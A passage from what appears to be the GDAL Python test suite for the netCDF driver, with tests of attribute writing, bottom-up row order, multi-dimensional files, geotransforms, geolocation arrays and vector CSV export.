    return netcdf_check_vars( 'tmp/netcdf_25.nc', expected_global, expected_band )
###############################################################################
# check support for NC4 writing attributes (single values and array values)
def netcdf_25_nc4():
    """Check NC4 writing of attributes by copying and re-checking metadata."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'
    result = netcdf_test_copy( 'data/nc4_vars.nc', 1, None, 'tmp/netcdf_25_nc4.nc', [ 'FORMAT=NC4' ] )
    if result != 'success':
        return result
    vals_global = {'NC_GLOBAL#test': 'testval',
                   'NC_GLOBAL#test_string': 'testval_string',
                   'NC_GLOBAL#valid_range_i': '0,255',
                   'NC_GLOBAL#valid_min': '10.1',
                   'NC_GLOBAL#test_b': '-100',
                   'NC_GLOBAL#test_ub': '200',
                   'NC_GLOBAL#test_s': '-16000',
                   'NC_GLOBAL#test_us': '32000',
                   'NC_GLOBAL#test_l': '-2000000000',
                   'NC_GLOBAL#test_ul': '4000000000'}
    # cleanup: 'valid_range_s' appeared twice in this literal (same value);
    # the duplicate entry has been removed
    vals_band = {'test_string_arr': 'test,string,arr',
                 'valid_min': '10.1',
                 'valid_range_b': '1,10',
                 'valid_range_ub': '1,200',
                 'valid_range_s': '0,255',
                 'valid_range_us': '0,32000',
                 'valid_range_l': '0,255',
                 'valid_range_ul': '0,4000000000',
                 'valid_range_d': '0.1111112222222,255.555555555556',
                 'valid_range_f': '0.1111111,255.5556'}
    return netcdf_check_vars( 'tmp/netcdf_25_nc4.nc', vals_global, vals_band )
###############################################################################
# check support for WRITE_BOTTOMUP file creation option
# use a dummy file with no lon/lat info to force a different checksum
# depending on y-axis order
def netcdf_26():
    """Check the WRITE_BOTTOMUP creation option.

    Uses a dummy file without lon/lat info so that the checksum differs
    depending on y-axis order.
    """
    if gdaltest.netcdf_drv is None:
        return 'skip'
    # default configuration (bottom-up writing)
    test_default = gdaltest.GDALTest( 'NETCDF', '../data/int16-nogeo.nc', 1, 4672 )
    gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
    outcome = test_default.testCreateCopy(check_gt=0, check_srs=0, check_minmax = 0)
    gdal.PopErrorHandler()
    if outcome != 'success':
        print('failed create copy without WRITE_BOTTOMUP')
        return outcome
    # explicit WRITE_BOTTOMUP=NO gives a different checksum
    test_no = gdaltest.GDALTest( 'NETCDF', '../data/int16-nogeo.nc', 1, 4855,
                                 options=['WRITE_BOTTOMUP=NO'] )
    outcome = test_no.testCreateCopy(check_gt=0, check_srs=0, check_minmax = 0)
    if outcome != 'success':
        print('failed create copy with WRITE_BOTTOMUP=NO')
        return outcome
    return 'success'
###############################################################################
# check support for GDAL_NETCDF_BOTTOMUP configuration option
def netcdf_27():
    """Check the GDAL_NETCDF_BOTTOMUP configuration option."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    # default configuration: option unset
    test_default = gdaltest.GDALTest( 'NETCDF', '../data/int16-nogeo.nc', 1, 4672 )
    saved = gdal.GetConfigOption( 'GDAL_NETCDF_BOTTOMUP' )
    gdal.SetConfigOption( 'GDAL_NETCDF_BOTTOMUP', None )
    outcome = test_default.testOpen()
    gdal.SetConfigOption( 'GDAL_NETCDF_BOTTOMUP', saved )
    if outcome != 'success':
        print('failed open without GDAL_NETCDF_BOTTOMUP')
        return outcome
    # GDAL_NETCDF_BOTTOMUP=NO gives a different checksum
    test_no = gdaltest.GDALTest( 'NETCDF', '../data/int16-nogeo.nc', 1, 4855 )
    saved = gdal.GetConfigOption( 'GDAL_NETCDF_BOTTOMUP' )
    gdal.SetConfigOption( 'GDAL_NETCDF_BOTTOMUP', 'NO' )
    outcome = test_no.testOpen()
    gdal.SetConfigOption( 'GDAL_NETCDF_BOTTOMUP', saved )
    if outcome != 'success':
        print('failed open with GDAL_NETCDF_BOTTOMUP')
        return outcome
    return 'success'
###############################################################################
# check support for writing multi-dimensional files (helper function)
def netcdf_test_4dfile( ofile ):
    """Verify that ofile is a valid 4D netcdf file (helper).

    The file must expose 8 bands and 0 subdatasets, and (when ncdump is
    available) its header must show the expected dimensions/variables.
    """
    # test result file has 8 bands and 0 subdatasets (instead of 0 bands and 8 subdatasets)
    ds = gdal.Open( ofile )
    if ds is None:
        gdaltest.post_reason( 'open of copy failed' )
        return 'fail'
    md = ds.GetMetadata( 'SUBDATASETS' )
    subds_count = 0
    if md is not None:
        # subdataset metadata comes as NAME/DESC pairs -> two entries each
        subds_count = len(md) // 2
    if ds.RasterCount != 8 or subds_count != 0:
        gdaltest.post_reason( 'copy has %d bands (expected 8) and has %d subdatasets'\
                              ' (expected 0)' % (ds.RasterCount, subds_count ) )
        return 'fail'
    # bug fix: this was 'ds is None', a no-op comparison expression that
    # never released the dataset; assignment was intended
    ds = None
    # get file header with ncdump (if available)
    try:
        (ret, err) = gdaltest.runexternal_out_and_err('ncdump -h')
    except Exception:
        print('NOTICE: ncdump not found')
        return 'success'
    if err is None or 'netcdf library version' not in err:
        print('NOTICE: ncdump not found')
        return 'success'
    (ret, err) = gdaltest.runexternal_out_and_err( 'ncdump -h '+ ofile )
    if ret == '' or err != '':
        gdaltest.post_reason( 'ncdump failed' )
        return 'fail'
    # simple dimension tests using ncdump output
    err = ""
    if not 'int t(time, levelist, lat, lon) ;' in ret:
        err = err + 'variable (t) has wrong dimensions or is missing\n'
    if not 'levelist = 2 ;' in ret:
        err = err + 'levelist dimension is missing or incorrect\n'
    if not 'int levelist(levelist) ;' in ret:
        err = err + 'levelist variable is missing or incorrect\n'
    if not 'time = 4 ;' in ret:
        err = err + 'time dimension is missing or incorrect\n'
    if not 'double time(time) ;' in ret:
        err = err + 'time variable is missing or incorrect\n'
    # uncomment this to get full header in output
    #if err != '':
    #    err = err + ret
    if err != '':
        gdaltest.post_reason( err )
        return 'fail'
    return 'success'
###############################################################################
# check support for writing multi-dimensional files using CreateCopy()
def netcdf_28():
    """Check writing multi-dimensional files using CreateCopy()."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    source = 'data/netcdf-4d.nc'
    target = 'tmp/netcdf_28.nc'
    # copy the 4D source file
    if netcdf_test_copy( source, 0, None, target ) != 'success':
        return 'fail'
    # verify structure of the resulting file
    return netcdf_test_4dfile( target )
###############################################################################
# Check support for writing multi-dimensional files using gdalwarp.
# Requires metadata copy support in gdalwarp (see bug #3898).
# First create a vrt file using gdalwarp, then copy file to netcdf.
# The workaround is (currently ??) necessary because dimension rolling code is
# in netCDFDataset::CreateCopy() and necessary dimension metadata
# is not saved to netcdf when using gdalwarp (as the driver does not write
# metadata to netcdf file with SetMetadata() and SetMetadataItem()).
def netcdf_29():
    """Check writing multi-dimensional files using gdalwarp.

    Requires metadata copy support in gdalwarp (see bug #3898). First
    creates a vrt file using gdalwarp, then copies that file to netcdf.
    The vrt intermediate is (currently ??) necessary because dimension
    rolling code lives in netCDFDataset::CreateCopy() and the required
    dimension metadata is not saved when warping straight to netcdf.
    """
    if gdaltest.netcdf_drv is None:
        return 'skip'
    # create tif file using gdalwarp
    if test_cli_utilities.get_gdalwarp_path() is None:
        gdaltest.post_reason('gdalwarp not found')
        return 'skip'
    ifile = 'data/netcdf-4d.nc'
    ofile1 = 'tmp/netcdf_29.vrt'
    ofile = 'tmp/netcdf_29.nc'
    warp_cmd = '%s -q -overwrite -of vrt %s %s' %\
        ( test_cli_utilities.get_gdalwarp_path(), ifile, ofile1 )
    try:
        (ret, err) = gdaltest.runexternal_out_and_err( warp_cmd )
    except:
        gdaltest.post_reason('gdalwarp execution failed')
        return 'fail'
    # gdalwarp runs with -q, so any output on stdout/stderr is an error
    if ( err != '' or ret != '' ):
        gdaltest.post_reason('gdalwarp returned error\n'+str(ret)+' '+str(err))
        return 'fail'
    # copy vrt to netcdf, with proper dimension rolling
    result = netcdf_test_copy( ofile1, 0, None, ofile )
    if result != 'success':
        return 'fail'
    # test file
    result = netcdf_test_4dfile( ofile )
    if result == 'fail':
        print('test failed - does gdalwarp support metadata copying?')
    return result
###############################################################################
# check support for file with nan values (bug #4705)
def netcdf_30():
    """Check support for a file containing nan values (bug #4705)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    test_case = gdaltest.GDALTest( 'NetCDF', 'trmm-nan.nc', 1, 62519 )
    # Quiet the 'No UNIDATA NC_GLOBAL:Conventions attribute' warning so the
    # test stream output stays clean.
    gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
    outcome = test_case.testOpen()
    gdal.PopErrorHandler()
    return outcome
###############################################################################
#check if 2x2 file has proper geotransform
#1 pixel (in width or height) still unsupported because we can't get the pixel dimensions
def netcdf_31():
    """Check that a 2x2 file gets a proper geotransform.

    1-pixel-wide/high files remain unsupported because the pixel
    dimensions cannot be derived.
    """
    if gdaltest.netcdf_drv is None:
        return 'skip'
    dataset = gdal.Open( 'data/trmm-2x2.nc' )
    dataset.GetProjection( )
    gt = dataset.GetGeoTransform( )
    dataset = None
    expected = ( -80.0, 0.25, 0.0, -19.5, 0.0, -0.25 )
    if gt != expected:
        gdaltest.post_reason( 'Incorrect geotransform, got '+str(gt) )
        return 'fail'
    return 'success'
###############################################################################
# Test NC_UBYTE write/read - netcdf-4 (FORMAT=NC4) only (#5053)
def netcdf_32():
    """Test NC_UBYTE write/read — netcdf-4 (FORMAT=NC4/NC4C) only (#5053)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'
    source = 'data/byte.tif'
    target = 'tmp/netcdf_32.nc'
    #gdal.SetConfigOption('CPL_DEBUG', 'ON')
    # basic read/write round-trip for both NC4 and NC4C formats
    for fmt in ( 'FORMAT=NC4', 'FORMAT=NC4C' ):
        if netcdf_test_copy( source, 1, 4672, target, [ fmt ] ) != 'success':
            return 'fail'
    return 'success'
###############################################################################
# TEST NC_UBYTE metadata read - netcdf-4 (FORMAT=NC4) only (#5053)
def netcdf_33():
    """Test NC_UBYTE metadata read — netcdf-4 (FORMAT=NC4) only (#5053)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    source = 'data/nc_vars.nc'
    target = 'tmp/netcdf_33.nc'
    copy_result = netcdf_test_copy( source, 1, None, target, [ 'FORMAT=NC4' ] )
    if copy_result != 'success':
        return copy_result
    return netcdf_check_vars( 'tmp/netcdf_33.nc' )
###############################################################################
# check support for reading large file with chunking and DEFLATE compression
# if chunking is not supported within the netcdf driver, this test can take very long
def netcdf_34():
    """Check reading a large chunked DEFLATE-compressed file.

    If chunking is not supported within the netcdf driver, this test can
    take very long; the open is run in a subprocess with a short timeout.
    """
    filename = 'utm-big-chunks.nc'
    # this timeout is more than enough - on my system takes <1s with fix, about 25 seconds without
    timeout = 5
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'
    if not gdaltest.run_slow_tests():
        return 'skip'
    try:
        from multiprocessing import Process
    except:
        print('from multiprocessing import Process failed')
        return 'skip'
    # fetch the test file from the OSGeo download server (cached locally)
    if not gdaltest.download_file('http://download.osgeo.org/gdal/data/netcdf/'+filename,filename):
        return 'skip'
    sys.stdout.write('.')
    sys.stdout.flush()
    tst = gdaltest.GDALTest( 'NetCDF', '../tmp/cache/'+filename, 1, 31621 )
    #tst.testOpen()
    # run the open in a subprocess so a hang can be killed after 'timeout'
    gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
    proc = Process( target=tst.testOpen )
    proc.start()
    proc.join( timeout )
    gdal.PopErrorHandler()
    # if proc is alive after timeout we must terminate it, and return fail
    # valgrind detects memory leaks when this occurs (although it should never happen)
    if proc.is_alive():
        proc.terminate()
        print('testOpen() for file %s has reached timeout limit of %d seconds' % (filename, timeout) )
        return 'fail'
    return 'success'
###############################################################################
# test writing a long metadata > 8196 chars (bug #5113)
def netcdf_35():
    """Test writing metadata longer than 8196 chars (bug #5113)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    source = 'data/netcdf_fixes.nc'
    target = 'tmp/netcdf_35.nc'
    # copy file
    if netcdf_test_copy( source, 0, None, target ) != 'success':
        return 'fail'
    # verify the long metadata survived the copy
    ds = gdal.Open( target )
    if ds is None:
        gdaltest.post_reason( 'open of copy failed' )
        return 'fail'
    md = ds.GetMetadata( '' )
    if 'U#bla' not in md:
        gdaltest.post_reason( 'U#bla metadata absent' )
        return 'fail'
    bla = md['U#bla']
    if len(bla) != 9591:
        gdaltest.post_reason( 'U#bla metadata is of length %d, expecting %d' % (len(bla),9591) )
        return 'fail'
    if bla[-4:] != '_bla':
        gdaltest.post_reason( 'U#bla metadata ends with [%s], expecting [%s]' % (bla[-4:], '_bla') )
        return 'fail'
    return 'success'
###############################################################################
# test for correct geotransform (bug #5114)
def netcdf_36():
    """Check the expected geotransform is read from netcdf_fixes.nc."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    expected = (-3.498749944898817, 0.0025000042385525173, 0.0,
                46.61749818589952, 0.0, -0.001666598849826389)

    ds = gdal.Open( 'data/netcdf_fixes.nc' )
    if ds is None:
        gdaltest.post_reason( 'open failed' )
        return 'fail'

    actual = ds.GetGeoTransform()
    if actual is None:
        gdaltest.post_reason( 'got no GeoTransform' )
        return 'fail'
    if actual != expected:
        gdaltest.post_reason( 'got GeoTransform %s, expected %s' % (str(actual), str(expected)) )
        return 'fail'
    return 'success'
###############################################################################
# test for reading gaussian grid (bugs #4513 and #5118)
def netcdf_37():
    """Read a gaussian-grid file: verify geotransform and 1D geolocation."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
    ds = gdal.Open( 'data/reduce-cgcms.nc' )
    gdal.PopErrorHandler()
    if ds is None:
        gdaltest.post_reason( 'open failed' )
        return 'fail'

    expected = (-1.875, 3.75, 0.0, 89.01354337620016, 0.0, -3.7088976406750063)
    actual = ds.GetGeoTransform()
    if actual is None:
        gdaltest.post_reason( 'got no GeoTransform' )
        return 'fail'
    if actual != expected:
        gdaltest.post_reason( 'got GeoTransform %s, expected %s' % (str(actual), str(expected)) )
        return 'fail'

    # The irregular latitudes must be exposed as a Y_VALUES geolocation list.
    md = ds.GetMetadata( 'GEOLOCATION2' )
    if not md or 'Y_VALUES' not in md:
        gdaltest.post_reason( 'did not get 1D geolocation' )
        return 'fail'
    y_vals = md['Y_VALUES']
    values_ok = y_vals.startswith('{-87.15909455586265,-83.47893666931698,') \
        and y_vals.endswith(',83.47893666931698,87.15909455586265}')
    if not values_ok:
        gdaltest.post_reason( 'got incorrect values in 1D geolocation' )
        return 'fail'
    return 'success'
###############################################################################
# test for correct geotransform of projected data in km units (bug #5118)
def netcdf_38():
    """Check the geotransform of projected data whose units are km."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
    ds = gdal.Open( 'data/bug5118.nc' )
    gdal.PopErrorHandler()
    if ds is None:
        gdaltest.post_reason( 'open failed' )
        return 'fail'

    expected = (-1659.3478178136488, 13.545000861672793, 0.0,
                2330.054725283668, 0.0, -13.54499744233631)
    actual = ds.GetGeoTransform()
    if actual is None:
        gdaltest.post_reason( 'got no GeoTransform' )
        return 'fail'
    if actual != expected:
        gdaltest.post_reason( 'got GeoTransform %s, expected %s' % (str(actual), str(expected)) )
        return 'fail'
    return 'success'
###############################################################################
# Test VRT and NETCDF:
def netcdf_39():
    """Test VRT copies of a netCDF subdataset addressed several ways.

    The 'z' variable of two_vars_scale_offset.nc is wrapped in a VRT using
    relative, quoted-relative, and absolute NETCDF: connection strings, and
    the band checksum is verified each time.  The four original copy-pasted
    stanzas are factored into one helper.
    """
    if gdaltest.netcdf_drv is None:
        return 'skip'

    def _check_vrt(src_name, vrt_name, stage_in_tmp):
        # One round-trip: optionally stage the source .nc under tmp/, create
        # a VRT copy of the requested subdataset, re-open the VRT (always via
        # the relative path, as in the original test) and verify the checksum.
        if stage_in_tmp:
            shutil.copy('data/two_vars_scale_offset.nc', 'tmp')
        src_ds = gdal.Open(src_name)
        out_ds = gdal.GetDriverByName('VRT').CreateCopy(vrt_name, src_ds)
        del out_ds
        src_ds = None
        ds = gdal.Open('tmp/netcdf_39.vrt')
        cs = ds.GetRasterBand(1).Checksum()
        ds = None
        if stage_in_tmp:
            gdal.Unlink('tmp/two_vars_scale_offset.nc')
        gdal.Unlink('tmp/netcdf_39.vrt')
        if cs != 65463:
            gdaltest.post_reason('failure')
            print(cs)
            return 'fail'
        return 'success'

    # Relative, unquoted subdataset name.
    if _check_vrt('NETCDF:tmp/two_vars_scale_offset.nc:z',
                  'tmp/netcdf_39.vrt', True) != 'success':
        return 'fail'
    # Relative, quoted subdataset name.
    if _check_vrt('NETCDF:"tmp/two_vars_scale_offset.nc":z',
                  'tmp/netcdf_39.vrt', True) != 'success':
        return 'fail'
    # Absolute quoted subdataset name and absolute VRT output path.
    if _check_vrt('NETCDF:"%s/tmp/two_vars_scale_offset.nc":z' % os.getcwd(),
                  '%s/tmp/netcdf_39.vrt' % os.getcwd(), True) != 'success':
        return 'fail'
    # Absolute source taken directly from data/, no staging under tmp/.
    if _check_vrt('NETCDF:"%s/data/two_vars_scale_offset.nc":z' % os.getcwd(),
                  'tmp/netcdf_39.vrt', False) != 'success':
        return 'fail'
    return 'success'
###############################################################################
# Check support of reading of chunked bottom-up files.
def netcdf_40():
    """Copy a chunked bottom-up NC4 file to ensure it reads correctly."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'
    return netcdf_test_copy('data/bug5291.nc', 0, None, 'tmp/netcdf_40.nc')
###############################################################################
# Test support for georeferenced file without CF convention
def netcdf_41():
    """Open a non-CF georeferenced file; check geotransform and projection."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    with gdaltest.error_handler():
        ds = gdal.Open('data/byte_no_cf.nc')
    if ds.GetGeoTransform() != (440720, 60, 0, 3751320, 0, -60):
        gdaltest.post_reason('failure')
        print(ds.GetGeoTransform())
        return 'fail'
    if ds.GetProjectionRef().find('26711') < 0:
        gdaltest.post_reason('failure')
        # Bug fix: previously printed the geotransform here, not the
        # projection string that actually failed the check.
        print(ds.GetProjectionRef())
        return 'fail'
    return 'success'
###############################################################################
# Test writing & reading GEOLOCATION array
def netcdf_42():
    """Write a dataset carrying a GEOLOCATION metadata domain to netCDF and
    verify the geolocation (lon/lat) arrays are written and re-read."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    # Build an in-memory source whose geolocation arrays point at an external
    # file (sstgeo.tif, band 1 = X, band 2 = Y).
    src_ds = gdal.GetDriverByName('MEM').Create('', 60, 39, 1)
    src_ds.SetMetadata( [
        'LINE_OFFSET=0',
        'LINE_STEP=1',
        'PIXEL_OFFSET=0',
        'PIXEL_STEP=1',
        'SRS=GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],TOWGS84[0,0,0,0,0,0,0],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9108"]],AXIS["Lat",NORTH],AXIS["Long",EAST],AUTHORITY["EPSG","4326"]]',
        'X_BAND=1',
        'X_DATASET=../gcore/data/sstgeo.tif',
        'Y_BAND=2',
        'Y_DATASET=../gcore/data/sstgeo.tif'], 'GEOLOCATION' )
    sr = osr.SpatialReference()
    sr.ImportFromEPSG(32631)
    src_ds.SetProjection(sr.ExportToWkt())

    gdaltest.netcdf_drv.CreateCopy('tmp/netcdf_42.nc', src_ds)

    # On re-open the GEOLOCATION domain must now reference the lon/lat
    # variables stored inside the netCDF file itself (note Y_BAND becomes 1).
    ds = gdal.Open('tmp/netcdf_42.nc')
    if ds.GetMetadata('GEOLOCATION') != {
        'LINE_OFFSET': '0',
        'X_DATASET': 'NETCDF:"tmp/netcdf_42.nc":lon',
        'PIXEL_STEP': '1',
        'SRS': 'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]]',
        'PIXEL_OFFSET': '0',
        'X_BAND': '1',
        'LINE_STEP': '1',
        'Y_DATASET': 'NETCDF:"tmp/netcdf_42.nc":lat',
        'Y_BAND': '1'}:
        gdaltest.post_reason('failure')
        print(ds.GetMetadata('GEOLOCATION'))
        return 'fail'

    # Checksums pin the content of the written lon/lat variables.
    ds = gdal.Open('NETCDF:"tmp/netcdf_42.nc":lon')
    if ds.GetRasterBand(1).Checksum() != 36043:
        gdaltest.post_reason('failure')
        print(ds.GetRasterBand(1).Checksum())
        return 'fail'
    ds = gdal.Open('NETCDF:"tmp/netcdf_42.nc":lat')
    if ds.GetRasterBand(1).Checksum() != 33501:
        gdaltest.post_reason('failure')
        print(ds.GetRasterBand(1).Checksum())
        return 'fail'
    return 'success'
###############################################################################
# Test reading GEOLOCATION array from geotransform (non default)
def netcdf_43():
    """Write byte.tif to netCDF with WRITE_LONLAT=YES and verify that the
    resulting file exposes a GEOLOCATION domain built from the lon/lat
    variables."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    src_ds = gdal.Open('data/byte.tif')
    # WRITE_LONLAT=YES forces explicit lon/lat coordinate variables even for
    # a dataset that already has a regular geotransform.
    gdaltest.netcdf_drv.CreateCopy('tmp/netcdf_43.nc', src_ds, options = ['WRITE_LONLAT=YES'] )

    ds = gdal.Open('tmp/netcdf_43.nc')
    if ds.GetMetadata('GEOLOCATION') != {
        'LINE_OFFSET': '0',
        'X_DATASET': 'NETCDF:"tmp/netcdf_43.nc":lon',
        'PIXEL_STEP': '1',
        'SRS': 'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]]',
        'PIXEL_OFFSET': '0',
        'X_BAND': '1',
        'LINE_STEP': '1',
        'Y_DATASET': 'NETCDF:"tmp/netcdf_43.nc":lat',
        'Y_BAND': '1'}:
        gdaltest.post_reason('failure')
        print(ds.GetMetadata('GEOLOCATION'))
        return 'fail'
    return 'success'
###############################################################################
# Test NC_USHORT/UINT read/write - netcdf-4 only (#6337)
def netcdf_44():
    """Round-trip unsigned short and unsigned int rasters through NC4."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'
    cases = [('data/ushort.nc', 18), ('data/uint.nc', 10)]
    for src, checksum in cases:
        result = netcdf_test_copy(src, 1, checksum, 'tmp/netcdf_44.nc', [ 'FORMAT=NC4' ])
        if result != 'success':
            return 'fail'
    return 'success'
###############################################################################
# Test reading a vector NetCDF 3 file
def netcdf_45():
    """Read the nc3 vector test file and validate its CSV/CSVT export.

    Also checks that a vector file refuses to open in raster-only mode, and
    a raster file refuses to open in vector-only mode.
    """
    if gdaltest.netcdf_drv is None:
        return 'skip'

    # Test that a vector cannot be opened in raster-only mode
    ds = gdal.OpenEx( 'data/test_ogr_nc3.nc', gdal.OF_RASTER )
    if ds is not None:
        gdaltest.post_reason('fail')
        return 'fail'

    # Test that a raster cannot be opened in vector-only mode
    ds = gdal.OpenEx( 'data/cf-bug636.nc', gdal.OF_VECTOR )
    if ds is not None:
        gdaltest.post_reason('fail')
        return 'fail'

    # Export the layer (exercising all field types) to CSV + CSVT.
    ds = gdal.OpenEx( 'data/test_ogr_nc3.nc', gdal.OF_VECTOR )
    with gdaltest.error_handler():
        gdal.VectorTranslate( '/vsimem/netcdf_45.csv', ds, format = 'CSV', layerCreationOptions = ['LINEFORMAT=LF', 'CREATE_CSVT=YES', 'GEOMETRY=AS_WKT'] )

    # NOTE(review): if VSIFOpenL fails, `content` stays unbound and the
    # comparison below raises NameError rather than reporting 'fail'.
    fp = gdal.VSIFOpenL( '/vsimem/netcdf_45.csv', 'rb' )
    if fp is not None:
        content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
        gdal.VSIFCloseL(fp)
    expected_content = """WKT,int32,int32_explicit_fillValue,float64,float64_explicit_fillValue,string1char,string3chars,twodimstringchar,date,datetime_explicit_fillValue,datetime,int64var,int64var_explicit_fillValue,boolean,boolean_explicit_fillValue,float32,float32_explicit_fillValue,int16,int16_explicit_fillValue,x,byte_field
"POINT Z (1 2 3)",1,1,1.23456789012,1.23456789012,x,STR,STR,1970/01/02,2016/02/06 12:34:56.789,2016/02/06 12:34:56.789,1234567890123,1234567890123,1,1,1.2,1.2,123,12,5,-125
"POINT (1 2)",,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,
"""
    if content != expected_content:
        gdaltest.post_reason('failure')
        print(content)
        return 'fail'

    # Same check for the companion .csvt column-type file.
    fp = gdal.VSIFOpenL( '/vsimem/netcdf_45.csvt', 'rb' )
    if fp is not None:
        content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
        gdal.VSIFCloseL(fp)
    expected_content = """WKT,Integer,Integer,Real,Real,String(1),String(3),String,Date,DateTime,DateTime,Integer64,Integer64,Integer(Boolean),Integer(Boolean),Real(Float32),Real(Float32),Integer(Int16),Integer(Int16),Real,Integer
"""
    if content != expected_content:
        gdaltest.post_reason('failure')
        print(content)
        return 'fail'

    gdal.Unlink('/vsimem/netcdf_45.csv')
    gdal.Unlink('/vsimem/netcdf_45.csvt')
    gdal.Unlink('/vsimem/netcdf_45.prj')
    return 'success'
###############################################################################
# Test reading a vector NetCDF 3 file
def netcdf_46():
    """Run test_ogrsf against the nc3 vector test file."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    ogrsf_path = test_cli_utilities.get_test_ogrsf_path()
    if ogrsf_path is None:
        return 'skip'
    output = gdaltest.runexternal(ogrsf_path + ' -ro data/test_ogr_nc3.nc')
    # test_ogrsf must report at least one INFO line and no ERROR lines.
    if 'INFO' not in output or 'ERROR' in output:
        print(output)
        return 'fail'
    return 'success'
###############################################################################
# Test reading a vector NetCDF 4 file
def netcdf_47():
    """Read the nc4 vector test file (including unsigned and 64-bit types)
    and validate its CSV/CSVT export."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'

    # Test that a vector cannot be opened in raster-only mode
    with gdaltest.error_handler():
        ds = gdal.OpenEx( 'data/test_ogr_nc4.nc', gdal.OF_RASTER )
    if ds is not None:
        gdaltest.post_reason('fail')
        return 'fail'

    ds = gdal.OpenEx( 'data/test_ogr_nc4.nc', gdal.OF_VECTOR )
    with gdaltest.error_handler():
        gdal.VectorTranslate( '/vsimem/netcdf_47.csv', ds, format = 'CSV', layerCreationOptions = ['LINEFORMAT=LF', 'CREATE_CSVT=YES', 'GEOMETRY=AS_WKT'] )

    # NOTE(review): if VSIFOpenL fails, `content` stays unbound and the
    # comparison below raises NameError rather than reporting 'fail'.
    fp = gdal.VSIFOpenL( '/vsimem/netcdf_47.csv', 'rb' )
    if fp is not None:
        content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
        gdal.VSIFCloseL(fp)
    expected_content = """WKT,int32,int32_explicit_fillValue,float64,float64_explicit_fillValue,string3chars,twodimstringchar,date,datetime,datetime_explicit_fillValue,int64,int64var_explicit_fillValue,boolean,boolean_explicit_fillValue,float32,float32_explicit_fillValue,int16,int16_explicit_fillValue,x,byte_field,ubyte_field,ubyte_field_explicit_fillValue,ushort_field,ushort_field_explicit_fillValue,uint_field,uint_field_explicit_fillValue,uint64_field,uint64_field_explicit_fillValue
"POINT Z (1 2 3)",1,1,1.23456789012,1.23456789012,STR,STR,1970/01/02,2016/02/06 12:34:56.789,2016/02/06 12:34:56.789,1234567890123,,1,1,1.2,1.2,123,12,5,-125,254,255,65534,65535,4000000000,4294967295,1234567890123,
"POINT (1 2)",,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,
"""
    if content != expected_content:
        gdaltest.post_reason('failure')
        print(content)
        return 'fail'

    # Same check for the companion .csvt column-type file.
    fp = gdal.VSIFOpenL( '/vsimem/netcdf_47.csvt', 'rb' )
    if fp is not None:
        content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
        gdal.VSIFCloseL(fp)
    expected_content = """WKT,Integer,Integer,Real,Real,String(3),String,Date,DateTime,DateTime,Integer64,Integer64,Integer(Boolean),Integer(Boolean),Real(Float32),Real(Float32),Integer(Int16),Integer(Int16),Real,Integer,Integer,Integer,Integer,Integer,Integer64,Integer64,Real,Real
"""
    if content != expected_content:
        gdaltest.post_reason('failure')
        print(content)
        return 'fail'

    gdal.Unlink('/vsimem/netcdf_47.csv')
    gdal.Unlink('/vsimem/netcdf_47.csvt')
    gdal.Unlink('/vsimem/netcdf_47.prj')
    return 'success'
###############################################################################
# Test reading a vector NetCDF 3 file without any geometry
def netcdf_48():
    """Open a vector file lacking X/Y/Z variables; geometry must be wkbNone."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    with gdaltest.error_handler():
        ds = gdal.OpenEx( 'data/test_ogr_no_xyz_var.nc', gdal.OF_VECTOR )
    layer = ds.GetLayer(0)
    if layer.GetGeomType() != ogr.wkbNone:
        gdaltest.post_reason('failure')
        return 'fail'
    feat = layer.GetNextFeature()
    if feat['int32'] != 1:
        gdaltest.post_reason('failure')
        return 'fail'
    return 'success'
###############################################################################
# Test reading a vector NetCDF 3 file with X,Y,Z vars as float
def netcdf_49():
